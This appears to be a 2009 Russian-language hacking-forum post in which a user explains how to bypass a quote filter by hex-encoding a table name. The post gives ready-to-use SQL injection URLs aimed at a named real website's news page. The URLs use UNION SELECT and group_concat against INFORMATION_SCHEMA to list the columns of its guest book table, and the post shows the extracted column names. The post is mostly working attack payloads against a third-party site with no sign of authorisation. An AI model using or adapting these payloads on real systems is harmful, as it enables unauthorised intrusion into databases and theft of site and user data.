22.09.2009, 23:19
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Вообще то WHERE+TABLE_NAME=0x67756573745f626f6f6b, так как фильтруются кавычки, нужно либо хексить, либо чарить.
Код:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b+LIMIT+1,1
Ну и для удобства вот так:
Код:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,group_concat(COLUMN_NAME),4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b--+
Получаем:
Код:
guest_book_id,gb_name,gb_email,gb_date,gb_text,gb_lang
Последний раз редактировалось Ins3t; 22.09.2009 в 23:38..
|
|
|